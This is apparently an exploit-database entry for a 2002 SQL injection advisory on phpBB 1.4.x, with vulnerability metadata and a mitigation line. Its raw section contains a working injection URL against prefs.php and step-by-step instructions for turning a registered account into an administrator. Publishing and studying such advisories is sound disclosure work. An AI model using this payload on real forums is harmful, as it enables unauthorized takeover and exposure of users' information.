phpBB Remote SQL Injection Vulnerability

vendor:

phpBB

by:

SecurityFocus

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpBB

Affected Version From: phpBB 1.4.x

Affected Version To: phpBB 1.4.x

Patch Exists: YES

Related CWE: N/A

CPE: a:phpbb:phpbb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

phpBB Remote SQL Injection Vulnerability

An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service. This problem is due to improper validation of user-supplied input by certain variables in phpBB. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values. One consequence of successful exploitation is that the attacker will be privy to user information.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3142/info

phpBB is free, open-source, easy-to-use web forums software.

An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service.

This problem is due to improper validation of user-supplied input by certain variables in phpBB. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values.

One consequence of successful exploitation is that the attacker will be privy to user information. 

http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%
20username%3D'l337h4x0r'%23

Summary:

1. Register an account on a phpBB board version
1.4.x .
2. Enter above URL with the correct sitename
and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of
the page.